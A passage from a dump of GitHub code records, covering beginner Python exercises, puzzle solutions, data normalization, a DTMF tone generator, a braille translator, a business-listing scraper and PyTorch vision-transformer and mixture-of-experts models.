db.commit()\n\n print('Device Found : %s \\n', itag_amount)\n\n if arg.discover:\n connect(devices)\n\n\nif __name__ == '__main__':\n scan()\n","repo_name":"BankyKmitl/Intern_SchoolBus","sub_path":"blescan.py","file_name":"blescan.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20727554768","text":"# a = 10\n# b = 2\n# def function():\n# print(a)\n# print(b)\n# function()\n\n# a = 9\n# def function ():\n# print(a)\n# b = 2\n\n# print(b)\n# print(a)\n# function()\n\n\n# def red(): \n# a = 2\n# B = 1\n# print(a)\n# print(B)\n\n# def blue():\n# nyno1 = 10\n# b = 2\n# print(nyno1 * b)\n# print(b)\n# blue()\n \n# def black():\n# nyno =4\n# nyno1 =3\n# print(nyno/nyno1)\n# black()\n\n\n# red()\n\n\n# a = 2\n# def function():\n# global a\n# a = 10\n# print(a)\n# function()\n# a\n\n\n# def red():\n# a= 1\n\n# def blue():\n# nonlocal a\n# a = 2\n# b = 3\n# print(a)\n# print(b)\n\n\n# blue()\n# print(b)\n\n# red()\n\n\n\na = \"Good\"\nb = \"Morning\"\nprint( a +\" \"+ b )","repo_name":"Nyneshwar8/git_py_training","sub_path":"DAY/Variablefunction.PY","file_name":"Variablefunction.PY","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"16995715082","text":"def solution(n, info):\n answer = []\n stack = [(n, 0, '', 0)]\n best_score = 0\n \n while stack:\n num_arrow, cur_pos, score_board, win = stack.pop()\n if cur_pos == len(info):\n if best_score < win:\n best_score = win\n answer = [score_board]\n elif best_score != 0 and best_score == win:\n answer.append(score_board)\n continue\n \n if num_arrow >= info[cur_pos] + 1:\n stack.append((num_arrow - info[cur_pos] - 1 , cur_pos+1, score_board + str(info[cur_pos] + 1), win + (10 - cur_pos)))\n \n score = (10 - cur_pos) if info[cur_pos] > 0 else 0\n stack.append((num_arrow, cur_pos+1, score_board + ('0' if cur_pos < len(info)-1 else str(num_arrow)), win - score))\n\n if not answer:\n return [-1]\n \n return list(map(int, sorted([a[::-1] for a in answer])[-1][::-1]))\n","repo_name":"sangmandu/Baejoon","sub_path":"프로그래머스/lv2/92342. 
양궁대회/양궁대회.py","file_name":"양궁대회.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2059969051","text":"import numpy as np\nimport pandas as pd\nfrom pathlib import Path\n\n\nclass Data(object):\n\n def __init__(self, InputData, system):\n\n self.Type = InputData.data_type\n try:\n self.data_preproc_type = InputData.data_preproc_type\n except:\n self.data_preproc_type = None\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def transform_normalization_data(self):\n\n if (self.trans_fun):\n for ifun, fun in enumerate(self.trans_fun):\n vars_list = self.trans_fun[fun]\n\n for ivar, var in enumerate(self.input_vars):\n if var in vars_list:\n if (fun == 'log10'):\n self.norm_input[var] = np.log10(self.norm_input[var])\n elif (fun == 'log'):\n self.norm_input[var] = np.log(self.norm_input[var])\n\n for ivar, var in enumerate(self.output_vars):\n if var in vars_list:\n if (fun == 'log10'):\n self.norm_output[var] = np.log10(self.norm_output[var])\n elif (fun == 'log'):\n self.norm_output[var] = np.log(self.norm_output[var])\n \n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def normalize_input_data(self, all_data):\n\n for i, now_data in enumerate(all_data):\n for data_id, xyi_data in now_data.items():\n if (data_id != 'res'):\n x_data = xyi_data[0]\n\n if (self.data_preproc_type == None) or (self.data_preproc_type == 'std') or (self.data_preproc_type == 'auto'):\n all_data[i][data_id][0] = (x_data - self.stat_input['mean'].to_numpy()) / self.stat_input['std'].to_numpy()\n\n elif (self.data_preproc_type == '0to1'):\n all_data[i][data_id][0] = (x_data - self.stat_input['min'].to_numpy()) / (self.stat_input['max'].to_numpy() - self.stat_input['min'].to_numpy())\n\n elif (self.data_preproc_type == 'range'):\n all_data[i][data_id][0] = (x_data) / (self.stat_input['max'].to_numpy() - self.stat_input['min'].to_numpy())\n\n elif (self.data_preproc_type == '-1to1'):\n all_data[i][data_id][0] = 2. 
* (x_data - self.stat_input['min'].to_numpy()) / (self.stat_input['max'].to_numpy() - self.stat_input['min'].to_numpy()) - 1.\n \n elif (self.data_preproc_type == 'pareto'):\n all_data[i][data_id][0] = (x_data - self.stat_input['mean'].to_numpy()) / np.sqrt(self.stat_input['std'].to_numpy())\n\n elif (self.data_preproc_type == 'log') or (self.data_preproc_type == 'log10'):\n all_data[i][data_id][0] = (x_data - self.stat_input['min'].to_numpy()+1e-10)\n \n # # PCA\n # all_data[i][data_id][1] = (x_data - self.system.C) / self.system.D\n \n return all_data\n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def normalize_output_data(self, all_data):\n\n for i, now_data in enumerate(all_data):\n for data_id, xyi_data in now_data.items():\n if (data_id != 'res'):\n y_data = xyi_data[1]\n\n if (self.data_preproc_type == None) or (self.data_preproc_type == 'std') or (self.data_preproc_type == 'auto'):\n all_data[i][data_id][1] = (y_data - self.stat_output['mean'].to_numpy()) / self.stat_output['std'].to_numpy()\n\n elif (self.data_preproc_type == '0to1'):\n all_data[i][data_id][1] = (y_data - self.stat_output['min'].to_numpy()) / (self.stat_output['max'].to_numpy() - self.stat_output['min'].to_numpy())\n\n elif (self.data_preproc_type == 'range'):\n all_data[i][data_id][1] = (y_data) / (self.stat_output['max'].to_numpy() - self.stat_output['min'].to_numpy())\n\n elif (self.data_preproc_type == '-1to1'):\n all_data[i][data_id][1] = 2. * (y_data - self.stat_output['min'].to_numpy()) / (self.stat_output['max'].to_numpy() - self.stat_output['min'].to_numpy()) - 1.\n\n elif (self.data_preproc_type == 'pareto'):\n all_data[i][data_id][1] = (y_data - self.stat_output['mean'].to_numpy()) / np.sqrt(self.stat_output['std'].to_numpy())\n\n elif (self.data_preproc_type == 'log'):\n all_data[i][data_id][1] = np.log(y_data - self.stat_output['min'].to_numpy()+1e-10)\n\n elif (self.data_preproc_type == 'log10'):\n all_data[i][data_id][1] = np.log10(y_data - self.stat_output['min'].to_numpy()+1e-10)\n\n # # PCA\n # all_data[i][data_id][1] = (y_data - self.system.C) / self.system.D\n \n return all_data\n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def compute_input_statistics(self):\n\n self.stat_input = {}\n self.stat_input['min'] = self.norm_input.min(axis = 0)\n self.stat_input['max'] = self.norm_input.max(axis = 0)\n self.stat_input['mean'] = self.norm_input.mean(axis = 0)\n self.stat_input['std'] = self.norm_input.std(axis = 0) \n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def compute_output_statistics(self):\n\n self.stat_output = {}\n self.stat_output['min'] = self.norm_output.min(axis = 0)\n self.stat_output['max'] = self.norm_output.max(axis = 0)\n self.stat_output['mean'] = self.norm_output.mean(axis = 0)\n self.stat_output['std'] = self.norm_output.std(axis = 0) \n\n # 
---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def read_output_statistics(self, PathToRead=None):\n\n if (PathToRead):\n DataNew = pd.read_csv(PathToRead + \"/Data/stats_output.csv\")\n else:\n DataNew = pd.read_csv(self.path_to_run_fld + \"/Data/stats_output.csv\")\n\n self.stat_output = {}\n self.stat_output['mean'] = DataNew['output_mean']\n self.stat_output['std'] = DataNew['output_std']\n self.stat_output['min'] = DataNew['output_min']\n self.stat_output['max'] = DataNew['output_max']\n\n # ---------------------------------------------------------------------------------------------------------------------------\n\n\n # ---------------------------------------------------------------------------------------------------------------------------\n def res_fn(self, net):\n '''Residual loss function'''\n\n self.n_inputs = net.n_inputs\n self.n_outputs = net.n_outputs\n\n def residual(inputs, training=True):\n return None\n \n return residual\n\n # ---------------------------------------------------------------------------------------------------------------------------\n","repo_name":"simoneventuri/ROMNet_","sub_path":"romnet/data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"46867982312","text":"# Question Link - https://leetcode.com/problems/coin-change-2/\n\n# Solution - \n\nclass Solution:\n # memoized\n def helper(self, target, coins, start, dt):\n if target == 0 : return 1\n if target < 0 : return 0\n if start == len(coins) : return 0\n if (target, start) in dt:\n return dt[(target, start)]\n firstWay = self.helper(target-coins[start], coins, start, dt);\n secondWay = self.helper(target, coins, start+1, dt);\n dt[(target, start)] = firstWay + secondWay\n return firstWay + secondWay\n def change(self, amount: int, coins: List[int]) -> int:\n return self.helper(amount, coins, 0, {});\n \n","repo_name":"codethat-vivek/Code","sub_path":"LeetCode/Coin Change 2.py","file_name":"Coin Change 2.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15881361133","text":"\n#importe as bibliotecas\nfrom email.mime import audio\nfrom pydub import AudioSegment\nfrom re import X\nimport wavio\nfrom suaBibSignal import *\nfrom math import *\nimport numpy as np\nimport sounddevice as sd\nimport matplotlib.pyplot as plt\n\n#funções a serem utilizadas\n# def signal_handler(signal, frame):\n# print('You pressed Ctrl+C!')\n# sys.exit(0)\n\n#converte intensidade em Db, caso queiram ...\ndef todB(s):\n sdB = 10*np.log10(s)\n return(sdB)\n\n\n\n\ndef main():\n \n \n #********************************************instruções*********************************************** \n # seu objetivo aqui é gerar duas senoides. 
Cada uma com frequencia corresposndente à tecla pressionada\n # então inicialmente peça ao usuário para digitar uma tecla do teclado numérico DTMF\n # agora, voce tem que gerar, por alguns segundos, suficiente para a outra aplicação gravar o audio, duas senoides com as frequencias corresposndentes à tecla pressionada, segundo a tabela DTMF\n # Essas senoides tem que ter taxa de amostragem de 44100 amostras por segundo, entao voce tera que gerar uma lista de tempo correspondente a isso e entao gerar as senoides\n # Lembre-se que a senoide pode ser construída com A*sin(2*pi*f*t)\n # O tamanho da lista tempo estará associada à duração do som. A intensidade é controlada pela constante A (amplitude da senoide). Construa com amplitude 1.\n # Some as senoides. A soma será o sinal a ser emitido.\n # Utilize a funcao da biblioteca sounddevice para reproduzir o som. Entenda seus argumento.\n # Grave o som com seu celular ou qualquer outro microfone. Cuidado, algumas placas de som não gravam sons gerados por elas mesmas. (Isso evita microfonia).\n \n # construa o gráfico do sinal emitido e o gráfico da transformada de Fourier. Cuidado. Como as frequencias sao relativamente altas, voce deve plotar apenas alguns pontos (alguns periodos) para conseguirmos ver o sinal\n \n\n print(\"Inicializando encoder\")\n numero = input(\"Digite um número de 0 a 9: \")\n\n print(\"Aguardando usuário\")\n def calculoSenoide(numero):\n if numero == '1':\n f1 = 697\n f2 = 1209\n elif numero == '2':\n f1 = 697\n f2 = 1336\n elif numero == '3':\n f1 = 697\n f2 = 1477\n elif numero == '4':\n f1 = 770\n f2 = 1209\n elif numero == '5':\n f1 = 770\n f2 = 1336\n elif numero == '6':\n f1 = 770\n f2 = 1477\n elif numero == '7':\n f1 = 852\n f2 = 1209\n elif numero == '8':\n f1 = 852\n f2 = 1336\n elif numero == '9':\n f1 = 852\n f2 = 1477\n elif numero == '0':\n f1 = 941\n f2 = 1336\n else:\n print(\"Número inválido\")\n return\n return [f1, f2]\n\n\n\n sinal = calculoSenoide(numero)\n fs = 44100\n t = 3\n t = np.arange(0, t, 1/fs)\n\n #Cálculo das senoides\n sinal1 = np.sin(2*pi*sinal[0]*t)\n sinal2 = np.sin(2*pi*sinal[1]*t)\n sinal = sinal1 + sinal2\n\n print(\"Gerando Tons base\")\n print(\"Executando as senoides (emitindo o som)\")\n #Tocando o sinal\n sd.play(sinal, fs)\n sd.wait()\n wavio.write(\"sinal.wav\", sinal, fs, sampwidth=3)\n\n #Plot do sinal\n plt.plot(t, sinal)\n plt.xlabel('Tempo (s)')\n plt.ylabel('Amplitude')\n plt.title('Gráfico das duas frequências somadas no tempo')\n plt.axis([0, 0.01, -2, 2])\n plt.show()\n\n\n #Plot da FFT\n sinal1 = signalMeu()\n sinal1.plotFFT(sinal, fs)\n plt.xlabel('Tempo (s)')\n plt.ylabel('Amplitude')\n plt.title('Gráfico da frequências do sinal emitido (COM FOURIER) no tempo')\n plt.show()\n # print(.format(NUM))\n # sd.play(tone, fs)\n # # Exibe gráficos\n # plt.show()\n # # aguarda fim do audio\n # sd.wait()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"caiotravain/Camada_Fisica","sub_path":"Projeto 7/encode_versaoAlunos.py","file_name":"encode_versaoAlunos.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3494083220","text":"from django.shortcuts import render\nfrom django.views.generic import View\n\n# Create your views here.\n\nclass LoginView(View):\n\tdef get(self, request):\n\t\ttemplate_name = \"cuentas/login.html\"\n\t\treturn render(request, template_name)\n\nclass homeView(View):\n\tdef get(self, request):\n\t\thome_name = 
\"cuentas/home.html\"\n\t\treturn render(request, home_name)\n\n\n","repo_name":"MarisolenlaWeb/Red_Social","sub_path":"cuentas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11953358501","text":"test_case = int(input())\nst = \"welcome to code jam\"\nfor i in range(test_case):\n string = [c for c in st]\n dp = [0]*(len(string)+1)\n for c in input():\n if c == 'w':\n dp[1]+=1\n for index,cc in enumerate(string):\n if cc==c:\n dp[index+1]+=dp[index]\n dp[len(string)] = dp[len(string)] % 10000\n print(\"Case #{}: {}\".format(i+1,str(dp[len(string)]).zfill(4)))","repo_name":"Hansel34/CPC","sub_path":"Kattis/Python/welcomeeasy.py","file_name":"welcomeeasy.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73955095602","text":"#!/usr/bin/env python3\n\nage=int(input(\"Please let me know how old are you:\"))\nname=str(input(\"Please inout your name:\"))\ncity=str(input(\"Please let me know which city are you in:\"))\n\nif age>18:\n print(\"You are an adult named\",name,\"lives in\", city)\nelse:\n print(\"You are a teenager named\",name,\"lives in\",city)\n\n","repo_name":"danxie1999/python_test","sub_path":"age_v2.py","file_name":"age_v2.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12601828","text":"# Translate alphabet based text to braille.\nimport mapAlphaToBraille, mapBrailleToAlpha\n\nCAPITAL = chr(10272) # ⠠\nNUMBER = chr(10300) # ⠼\nUNRECOGNIZED = '?'\n\n# There is no braille symbol for a generic quote (\").\n# There is only open quotation (“) and closed quotation (”).\n# Therefore we must keep track of what the last quotation was\n# so that we may convert the generic quotation to a specific one.\nopen_quotes = True\n\n\ndef extract_words(string):\n # Split up a sentence based on whitespace (\" \") and new line (\"\\n\") chars.\n words = string.split(\" \")\n result = []\n for word in words:\n temp = word.split(\"\\n\")\n for item in temp:\n result.append(item)\n return result\n\n\ndef is_braille(char):\n # Return true if a char is braille.\n if len(char) > 1:\n return False\n return char in mapBrailleToAlpha.letters \\\n or char in mapBrailleToAlpha.numbers \\\n or char in mapBrailleToAlpha.punctuation \\\n or char in mapBrailleToAlpha.contractions \\\n or char == CAPITAL \\\n or char == NUMBER\n\n\ndef trim(word):\n # Remove punctuation around a word. 
Example: cat.\" becomes cat\n while len(word) is not 0 and not word[0].isalnum():\n word = word[1:]\n while len(word) is not 0 and not word[-1].isalnum():\n word = word[:-1]\n return word\n\n\ndef numbers_handler(word):\n # Replace each group of numbers in a word to their respective braille representation.\n if word == \"\":\n return word\n result = word[0]\n if word[0].isdigit():\n result = NUMBER + mapAlphaToBraille.numbers.get(word[0])\n for i in range(1, len(word)):\n if word[i].isdigit() and word[i-1].isdigit():\n result += mapAlphaToBraille.numbers.get(word[i])\n elif word[i].isdigit():\n result += NUMBER + mapAlphaToBraille.numbers.get(word[i])\n else:\n result += word[i]\n return result\n\n\ndef capital_letters_handler(word):\n # Put the capital escape code before each capital letter.\n if word == \"\":\n return word\n result = \"\"\n for char in word:\n if char.isupper():\n result += CAPITAL + char.lower()\n else:\n result += char.lower()\n return result\n\n\ndef find_utf_code(char):\n # Find the UTF code of a particular character. Used what an unidentified char is found.\n if len(char) != 1:\n return -1\n for i in range(0, 55000):\n if char == chr(i):\n return i\n\n\ndef char_to_braille(char):\n # Convert an alphabetic char to braille.\n if is_braille(char):\n return char\n elif char == \"\\n\":\n return \"\\n\"\n elif char == \"\\\"\":\n global open_quotes\n if open_quotes:\n open_quotes = not open_quotes\n return mapAlphaToBraille.punctuation.get(\"“\")\n else:\n open_quotes = not open_quotes\n return mapAlphaToBraille.punctuation.get(\"”\")\n elif char in mapAlphaToBraille.letters and char.isupper():\n return CAPITAL + mapAlphaToBraille.letters.get(char)\n elif char in mapAlphaToBraille.letters:\n return mapAlphaToBraille.letters.get(char)\n elif char in mapAlphaToBraille.punctuation:\n return mapAlphaToBraille.punctuation.get(char)\n else:\n print(\"Unrecognized Symbol:\", char, \"with UTF code:\", find_utf_code(char))\n return UNRECOGNIZED\n\n\ndef word_to_braille(word):\n # Convert an alphabetic word to braille.\n if word in mapAlphaToBraille.contractions:\n return mapAlphaToBraille.contractions.get(word)\n else:\n result = \"\"\n for char in word:\n result += char_to_braille(char)\n return result\n\n\ndef build_braille_word(trimmed_word, shavings, index, braille):\n # Translate a trimmed word to braille then re-attach the shavings.\n if shavings == \"\":\n braille += word_to_braille(trimmed_word)\n else:\n for i in range(0, len(shavings)):\n if i == index and trimmed_word is not \"\":\n braille += word_to_braille(trimmed_word)\n braille += word_to_braille(shavings[i])\n if index == len(shavings): # If the shavings are all at the beginning.\n braille += word_to_braille(trimmed_word)\n return braille\n\n\ndef translate(string):\n # Convert alphabetic text to braille.\n braille = \"\"\n words = extract_words(string)\n for word in words:\n word = numbers_handler(word)\n word = capital_letters_handler(word)\n trimmed_word = trim(word) # Remove punctuation (ex: change dog?\" to dog)\n untrimmed_word = word\n index = untrimmed_word.find(trimmed_word)\n shavings = untrimmed_word.replace(trimmed_word, \"\")\n braille = build_braille_word(trimmed_word, shavings, index, braille) + \" \"\n return braille[:-1] # Remove the final space that was added.\n\n'''\nThe Algorithm for Translating Alphabet Based Text to Grade 2 Braille:\n1. Split up the text into words by dividing them based on whitespace characters.\n - Whitespace includes spaces (' ') and new lines ('\\n')\n2. 
For each word, handle the numbers first.\n - Numbers in braille use the same symbols as the first 10 letters of the alphabet.\n - The number '7' and the letter 'g' are both represented by '⠛'.\n - To differentiate between numbers and letters, an escape code (⠼) is placed before groups of numbers.\n - Therefore '7' is actually '⠼⠛' whereas 'g' is only '⠛'.\n - In this step, only the numbers are dealt with, so there will be a mix of both braille and Alphabet symbols.\n - Example: \"123-456-JUNK\" becomes \"⠼⠁⠃⠉-⠼⠙⠑⠋-JUNK\"\n3. Handle the capitals.\n - Similarly to numbers in braille, capital letters need an escape code (⠠).\n - The escape code (⠠) is added to the beginning of each capital letter and the letter is changed to lowercase.\n - Example 1: \"⠼⠁⠃⠉-⠼⠙⠑⠋-JUNK\" becomes \"⠼⠁⠃⠉-⠼⠙⠑⠋-⠠j⠠u⠠n⠠k\". The dashes still remain.\n - Example 2: \"Sweet\" becomes \"⠠sweet\". The non-capital letters remain untouched.\n4. Trim the word.\n - Sometimes the words extracted contain punctuation attached to them such as commas or brackets.\n - Words need to be trimmed so that they can be converted to contractions.\n - Example: The word \"the\" is represented by a single braille symbol (⠮).\n - If the word \"the\" has punctuation around it (\"the!\") then it will not be interpreted correctly.\n - This is also why capitals are converted to lowercase in step 3 because \"The\" would not work either.\n - The characters that are trimmed off are called \"shavings\".\n - Example: In the word \"!where?\", the shavings are \"!?\" and the trimmed word is \"where\".\n5. Build the translation.\n a) Check to see if the trimmed word can be contracted.\n - This includes common words like \"the\", \"in\", \"you\" etc...\n b) Translate the remaining characters that are still alphabetic.\n c) Translate the shavings (this will mostly just be punctuation).\n - Exceptions to be mindful of:\n - There is no braille symbol for a generic quote (\")\n - There is only open quotation (“) and closed quotation (”).\n - Therefore we must keep track of what the last quotation was to convert it correctly.\n'''","repo_name":"LazoCoder/Braille-Translator","sub_path":"alphaToBraille.py","file_name":"alphaToBraille.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"43030011210","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom csv import writer\r\n\r\nurl = \"https://www.yellowpages.ca/search/si/1/Restaurants/Toronto+ON\"\r\nurl1 = \"https://www.yellowpages.ca/search/si/1/Stock+Market/Toronto+ON\"\r\n\r\npage1 = requests.get(url1)\r\n\r\nsoup = BeautifulSoup(page1.content, 'html.parser')\r\n\r\nlists1 = soup.find_all('div', class_=\"listing_right_section\")\r\n\r\nwith open('StockMarket.csv', 'w', encoding='utf8', newline='') as f:\r\n thewriter = writer(f)\r\n header = ['BusinessName', 'PhoneNumber', 'Address', 'Title']\r\n thewriter.writerow(header)\r\n\r\n for list1 in lists1:\r\n businessname = list1.find('a', class_=\"listing__name--link listing__link jsListingName\").text.replace('\\n', '')\r\n PhoneNumber = list1.find('ul', class_=\"mlr__submenu\").text.replace('\\n', '')\r\n address = list1.find('span', class_=\"listing__address--full\").text.replace('\\n', '')\r\n title = list1.find('div', class_=\"listing__headings__roots\").text.replace('\\n', '')\r\n\r\n info1 = [businessname, PhoneNumber, address, title]\r\n 
thewriter.writerow(info1)\r\n\r\n\r\n\r\n","repo_name":"JavaXV/python.scrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23410055126","text":"from functools import partial\n\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn.functional as F\nfrom einops import rearrange\nfrom einops.layers.torch import Rearrange\nfrom torch import nn\n\nfrom src.models.moe import SMoE\nfrom src.models.vit_small import MoEViTLightning, ViTLightning\nfrom src.models.xcit import MoEXCiTLightning, XCiTLightning\nfrom src.utils.metrics import cls_acc\n\n# helpers\n\n\ndef pair(t):\n return t if isinstance(t, tuple) else (t, t)\n\n\ndef posemb_sincos_2d(patches, temperature=10000, dtype=torch.float32):\n _, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype\n\n y, x = torch.meshgrid(\n torch.arange(h, device=device), torch.arange(w, device=device), indexing=\"ij\"\n )\n assert (dim % 4) == 0, \"feature dimension must be multiple of 4 for sincos emb\"\n omega = torch.arange(dim // 4, device=device) / (dim // 4 - 1)\n omega = 1.0 / (temperature ** omega)\n\n y = y.flatten()[:, None] * omega[None, :]\n x = x.flatten()[:, None] * omega[None, :]\n pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1)\n return pe.type(dtype)\n\n\n# classes\n\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, hidden_dim):\n super().__init__()\n self.net = nn.Sequential(\n nn.LayerNorm(dim),\n nn.Linear(dim, hidden_dim),\n nn.GELU(),\n nn.Linear(hidden_dim, dim),\n )\n\n def forward(self, x):\n return self.net(x)\n\n\nclass NoisyTopK(nn.Module):\n def __init__(self, k, sigma):\n super().__init__()\n self.k = k\n self.sigma = sigma\n\n def forward(self, gate_out):\n \"\"\"\n gate_out: shape: (b, e)\n topk_out: shape: (b, k)\n \"\"\"\n noise = torch.randn_like(gate_out, device=\"cuda\") * self.sigma\n gate_out = gate_out + noise\n topk_out, indices = torch.topk(gate_out, self.k, dim=-1) # shape: b, k\n return topk_out, indices\n\n\nclass ModuleListWrapper(nn.ModuleList):\n def forward(self, x):\n return [module(x) for module in self]\n\n\nclass MoE_MLP(nn.Module):\n def __init__(self, gate_dim, dim, hidden_dim, num_experts, k, sigma=None):\n super().__init__()\n self.num_experts = num_experts\n self.k = k\n self.experts = ModuleListWrapper(\n [FeedForward(dim, hidden_dim) for _ in range(num_experts)]\n )\n self.gate = nn.Linear(gate_dim, num_experts, bias=False)\n if sigma is None:\n sigma = 1.0 / num_experts\n self.noisy_topk = NoisyTopK(k, sigma)\n\n def forward(self, h):\n \"\"\"\n h: shape: (b, dim_head, dim) = (b, dh, d)\n out: shape: (b, dim_head, dim) = (b, dh, d)\n \"\"\"\n gate_out = torch.softmax(\n self.gate(rearrange(h, \"b dh d -> b (dh d)\")), dim=-1\n ) # shape (b, e)\n gate_out, indices = self.noisy_topk(gate_out) # shape (b, k)\n gate_out = rearrange(gate_out, \"b k -> k b 1 1\")\n b, dh, d = h.shape\n topk_out = torch.zeros(self.k, b, dh, d, device=\"cuda\")\n for i in range(b):\n for k in range(self.k):\n topk_out[k, i, :, :] = self.experts[indices[i, k]](h[i])\n out = torch.sum(gate_out * topk_out, dim=0) # shape (b, dh, d)\n return out\n\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads=8, dim_head=64):\n super().__init__()\n inner_dim = dim_head * heads\n self.heads = heads\n self.scale = dim_head ** -0.5\n self.norm = nn.LayerNorm(dim)\n\n self.attend = nn.Softmax(dim=-1)\n\n self.to_qkv = nn.Linear(dim, 
inner_dim * 3, bias=False)\n self.to_out = nn.Linear(inner_dim, dim, bias=False)\n\n def forward(self, x):\n x = self.norm(x)\n qkv = self.to_qkv(x).chunk(3, dim=-1)\n q, k, v = map(lambda t: rearrange(t, \"b n (h d) -> b h n d\", h=self.heads), qkv)\n\n dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale\n\n attn = self.attend(dots)\n\n out = torch.matmul(attn, v)\n out = rearrange(out, \"b h n d -> b n (h d)\")\n return self.to_out(out)\n\n\nclass Transformer(nn.Module):\n def __init__(self, dim, depth, heads, dim_head, mlp_dim):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(\n nn.ModuleList(\n [\n Attention(dim, heads=heads, dim_head=dim_head),\n FeedForward(dim, mlp_dim),\n ]\n )\n )\n\n def forward(self, x):\n for attn, ff in self.layers:\n x = attn(x) + x\n x = ff(x) + x\n return x\n\n\nclass SimpleViT(pl.LightningModule):\n def __init__(\n self,\n *,\n image_size,\n patch_size,\n num_classes,\n dim,\n depth,\n heads,\n mlp_dim,\n channels=3,\n dim_head=64,\n optimizer,\n lr\n ):\n super().__init__()\n self.optimizer = optimizer\n self.lr = lr\n image_height, image_width = pair(image_size)\n patch_height, patch_width = pair(patch_size)\n\n assert (\n image_height % patch_height == 0 and image_width % patch_width == 0\n ), \"Image dimensions must be divisible by the patch size.\"\n\n num_patches = (image_height // patch_height) * (image_width // patch_width)\n patch_dim = channels * patch_height * patch_width\n\n self.to_patch_embedding = nn.Sequential(\n Rearrange(\n \"b c (h p1) (w p2) -> b h w (p1 p2 c)\", p1=patch_height, p2=patch_width\n ),\n nn.Linear(patch_dim, dim),\n )\n\n self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim)\n\n self.to_latent = nn.Identity()\n self.linear_head = nn.Sequential(nn.LayerNorm(dim), nn.Linear(dim, num_classes))\n\n def forward(self, img):\n *_, h, w, dtype = *img.shape, img.dtype\n\n x = self.to_patch_embedding(img)\n pe = posemb_sincos_2d(x)\n x = rearrange(x, \"b ... d -> b (...) 
d\") + pe\n\n x = self.transformer(x)\n x = x.mean(dim=1)\n\n x = self.to_latent(x)\n return self.linear_head(x)\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n loss = F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"train_loss\": loss.item(), \"train_acc\": acc},\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n loss = F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"val_loss\": loss.item(), \"val_acc\": acc}, on_epoch=True, prog_bar=True\n )\n return loss\n\n def test_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n loss = F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"test_loss\": loss.item(), \"test_acc\": acc}, on_epoch=True, prog_bar=True\n )\n return loss\n\n def configure_optimizers(self):\n if self.optimizer == \"adam\":\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n elif self.optimizer == \"sgd\":\n optimizer = torch.optim.SGD(self.parameters(), lr=self.lr)\n else:\n raise ValueError(\"Optimizer not supported\")\n return optimizer\n\n\nclass MoETransformer(nn.Module):\n def __init__(self, dim, depth, heads, dim_head, mlp_dim, num_experts=4, k=2):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(\n nn.ModuleList(\n [\n Attention(dim, heads=heads, dim_head=dim_head),\n MoE_MLP(dim * dim_head, dim, mlp_dim, num_experts, k),\n ]\n )\n )\n\n def forward(self, x):\n for attn, ff in self.layers:\n x = attn(x) + x\n x = ff(x) + x\n return x\n\n\nclass SMoETransformer(nn.Module):\n def __init__(\n self,\n dim,\n depth,\n heads,\n dim_head,\n mlp_dim,\n num_experts,\n noisy_gating,\n k,\n dropout,\n hidden_act,\n ): # , num_experts = 4, k = 2):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(\n nn.ModuleList(\n [\n Attention(dim, heads=heads, dim_head=dim_head),\n SMoE(\n num_experts,\n dim,\n dim,\n 